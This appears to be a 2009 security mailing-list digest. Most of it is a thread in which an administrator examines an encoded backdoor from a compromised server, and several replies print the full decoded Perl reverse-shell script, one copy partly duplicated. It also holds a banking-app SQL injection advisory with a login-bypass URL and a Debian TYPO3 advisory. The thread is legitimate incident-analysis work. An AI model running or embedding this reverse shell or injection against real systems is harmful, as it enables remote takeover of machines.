open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); Tasos 2009/2/10 sr. > can anyone tell me what encoding this is? > > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > > -- AM -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090210/ed222604/attachment.html From gcastrop at gmail.com Tue Feb 10 19:10:53 2009 From: gcastrop at gmail.com (Gustavo Castro) Date: Tue, 10 Feb 2009 17:10:53 -0200 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: "Sr." This is base64 encoded. 2009/2/10 sr. : > can anyone tell me what encoding this is? > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. -- Saludos, Gustavo Castro Puig. E-Mail: gcastrop at gmail.com LPI Level-1 Certified (https://www.lpi.org/es/verify.html LPID:LPI000042304 Verification Code: hp6re8w5qg ) -----BEGIN GEEK CODE BLOCK----- Version: 3.12 GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o? K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++ D++ G++ e++ h--- r y+++ ------END GEEK CODE BLOCK------ Registered Linux User #69342 From ilaiy.e at gmail.com Tue Feb 10 19:22:03 2009 From: ilaiy.e at gmail.com (ilaiy) Date: Tue, 10 Feb 2009 11:22:03 -0800 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <849b9b760902101122p6e0b6ad2q9f24617f55fd1a89@mail.gmail.com> Here you go #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); Ilaiy On Tue, Feb 10, 2009 at 10:23 AM, sr. wrote: > can anyone tell me what encoding this is? > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > > From staticrez at gmail.com Tue Feb 10 19:34:37 2009 From: staticrez at gmail.com (sr.) Date: Tue, 10 Feb 2009 14:34:37 -0500 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <5d80962a0902101134m4c42b9f1lfc59617054b830b7@mail.gmail.com> i really appreciate all of the responses. this is what community is all about. i'd seen the "==" in other encoding schemes, but just wasn't sure and wanted a quick response...thanks to everyone who responded! I'll post the rest of my findings on here asap. i'm looking into an old compromised machine. this is nothing new.. whoever mentioned the r57 shell, you're probably right as the script connects to a remote box @ port 11457. this is r57 behaviour. i also found a copy of the same script i'm dissecting on someone else's box, you can check it out here: http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php in my case, a bunch of php files were modified. i'll zip everything up and host it so you can all analyze... thx, sr. aka "fabrizio siciliano" On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro wrote: > "Sr." > > This is base64 encoded. > > 2009/2/10 sr. : >> can anyone tell me what encoding this is? >> >> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj >> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR >> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT >> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI >> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi >> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl >> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; >> >> this has to do with old php 4.x.x version with magic quotes enabled. >> i'm just trying to figure out what the connect back code does. >> >> any input is much appreciated. >> >> thx, >> >> sr. > > -- > Saludos, > Gustavo Castro Puig. > E-Mail: gcastrop at gmail.com > > LPI Level-1 Certified (https://www.lpi.org/es/verify.html > LPID:LPI000042304 Verification Code: hp6re8w5qg ) > -----BEGIN GEEK CODE BLOCK----- > Version: 3.12 > GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o? > K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++ > D++ G++ e++ h--- r y+++ > ------END GEEK CODE BLOCK------ > Registered Linux User #69342 > From f.bianchino at gmail.com Tue Feb 10 19:54:56 2009 From: f.bianchino at gmail.com (Francesco Bianchino) Date: Tue, 10 Feb 2009 20:54:56 +0100 Subject: [Full-disclosure] Craft Silicon Banking@Home SQL Injection Message-ID: <6886de5a0902101154i5264cd28wf3b59e016eccc0ac@mail.gmail.com> Craft Silicon Banking at Home SQL Injection *********************************************************************** Author: Francesco Bianchino Email: f.bianchino [at] gmail.com Title: Craft Silicon Banking at Home SQL Injection Product: Banking at Home - Net Banking Versions Vulnerable: 2.1 and below Vendor: Craft Silicon (www.craftsilicon.com) *********************************************************************** Summary Banking at Home is an home banking application that allows customers to access their account information using the web. The application uses data in a database management system that uses Structured Query Language (SQL) as a data access standard. ********************************************************************** Vulnerability Details The login page of Net Banking is vulnerable to SQL Injection attack, due to a missing input validation mechanisms. An attacker can inject SQL code into the username and password fields, altering the login procedure. There is a classic error based injection, really easy to exploit to take control of the entire server. Authentication bypass is possible using valid username, no password is required, or otherwise the user table can be arbitrary modified. *********************************************************************** Exploit http://www.example.com/document_root/Login.asp?LoginName='Some_SQL_Stuff&Password=&submit=Login *********************************************************************** Solution At the moment of writing this advisory there is no solution yet. I advised Craft Silicon in November 2008 and i actually have received no answer. *********************************************************************** Credits Discovered by Francesco Bianchino. From juha-matti.laurio at netti.fi Tue Feb 10 20:04:47 2009 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Tue, 10 Feb 2009 22:04:47 +0200 (EET) Subject: [Full-disclosure] connect back PHP hack Message-ID: <28908282.990371234296288491.JavaMail.juha-matti.laurio@netti.fi> This triggers AV as Backdoor.PHP.RST.I etc. Juha-Matti From jklemenc at fnal.gov Tue Feb 10 19:45:26 2009 From: jklemenc at fnal.gov (Joe Klemencic) Date: Tue, 10 Feb 2009 13:45:26 -0600 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <4991D956.1080604@fnal.gov> It is a simple Base64 encoding containing a Perl script: #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); sr. wrote: > can anyone tell me what encoding this is? > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 2707 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090210/a72c2d30/attachment.bin From leszek.mis at gmail.com Tue Feb 10 19:31:18 2009 From: leszek.mis at gmail.com (crony) Date: Tue, 10 Feb 2009 20:31:18 +0100 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: Hey. It's base64 encoded. Here is decoded output: #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); 2009/2/10 sr. > can anyone tell me what encoding this is? > > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > > -- Pozdrawiam Leszek Mi? Nothing is secure, paranoia is your friend. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090210/59f93fbe/attachment.html From joren at streamingedge.com Tue Feb 10 19:56:21 2009 From: joren at streamingedge.com (Joren Gaucher) Date: Tue, 10 Feb 2009 14:56:21 -0500 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <4991DBE5.7050202@streamingedge.com> base64 decode: (easy to tell with the padding of '==') #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1];#!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); J sr. wrote: > can anyone tell me what encoding this is? > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > > From mathewm at sdf.lonestar.org Tue Feb 10 20:34:06 2009 From: mathewm at sdf.lonestar.org (mathewm at sdf.lonestar.org) Date: Wed, 11 Feb 2009 07:34:06 +1100 (EST) Subject: [Full-disclosure] connect back PHP hack Message-ID: sr. wrote: > can anyone tell me what encoding this is? > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > Base64. It decodes as: #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); HTH From nion at debian.org Tue Feb 10 20:52:40 2009 From: nion at debian.org (Nico Golde) Date: Tue, 10 Feb 2009 21:52:40 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 1720-1] New TYPO3 packages fix several vulnerabilities Message-ID: <20090210205240.BB0AA2B3E2A@finlandia.home.infodrom.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1720-1 security at debian.org http://www.debian.org/security/ Martin Schulze February 10th, 2009 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : typo3-src Vulnerability : several Problem type : remote Debian-specific: no Debian Bug : 514713 Several remote vulnerabilities have been discovered in the TYPO3 web content management framework. Marcus Krause and Michael Stucki from the TYPO3 security team discovered that the jumpUrl mechanism discloses secret hashes enabling a remote attacker to bypass access control by submitting the correct value as a URL parameter and thus being able to read the content of arbitrary files. Jelmer de Hen and Dmitry Dulepov discovered multiple cross-site scripting vulnerabilities in the backend user interface allowing remote attackers to inject arbitrary web script or HTML. As it is very likely that your encryption key has been exposed we strongly recommend to change your encyption key via the install tool after installing the update. For the stable distribution (etch) these problems have been fixed in version 4.0.2+debian-8. For the testing distribution (lenny) these problems have been fixed in version 4.2.5-1+lenny1. For the unstable distribution (sid) these problems have been fixed in version 4.2.6-1. We recommend that you upgrade your typo3 package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian-8.dsc Size/MD5 checksum: 618 8a7ebb8edf133224fc8c552c12b6cb3d http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian-8.diff.gz Size/MD5 checksum: 24943 588b00a669ba0db62551749d9379a0ce http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian.orig.tar.gz Size/MD5 checksum: 7683527 be509391b0e4d24278c14100c09dc673 Architecture independent components: http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src-4.0_4.0.2+debian-8_all.deb Size/MD5 checksum: 7677310 456187cb35360f2f9b35ab54fb8d6db5 http://security.debian.org/pool/updates/main/t/typo3-src/typo3_4.0.2+debian-8_all.deb Size/MD5 checksum: 77252 87ceec7498d3df3436dc0a663088d2b6 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJkekUW5ql+IAeqTIRAmcrAKC4kFo9JIPMxth84ZxxmMSe5FIGaACgoXkp 6di1jqOPGBzLHH3TPYKca2o= =kmvS -----END PGP SIGNATURE----- From clement.dupuis at gmail.com Tue Feb 10 20:41:36 2009 From: clement.dupuis at gmail.com (Clement Dupuis) Date: Wed, 11 Feb 2009 00:41:36 +0400 Subject: [Full-disclosure] connect back PHP hack In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com> Message-ID: <491636e50902101241w298519ecnf7f92401784bfefa@mail.gmail.com> It is base64 encoding. The two dashes at the end gives it away. Something similar to: #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); I used the free decoder encoder at: http://ostermiller.org/calc/encode.html Take care Clement On Tue, Feb 10, 2009 at 10:23 PM, sr. wrote: > can anyone tell me what encoding this is? > > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090211/e84d5db8/attachment.html From 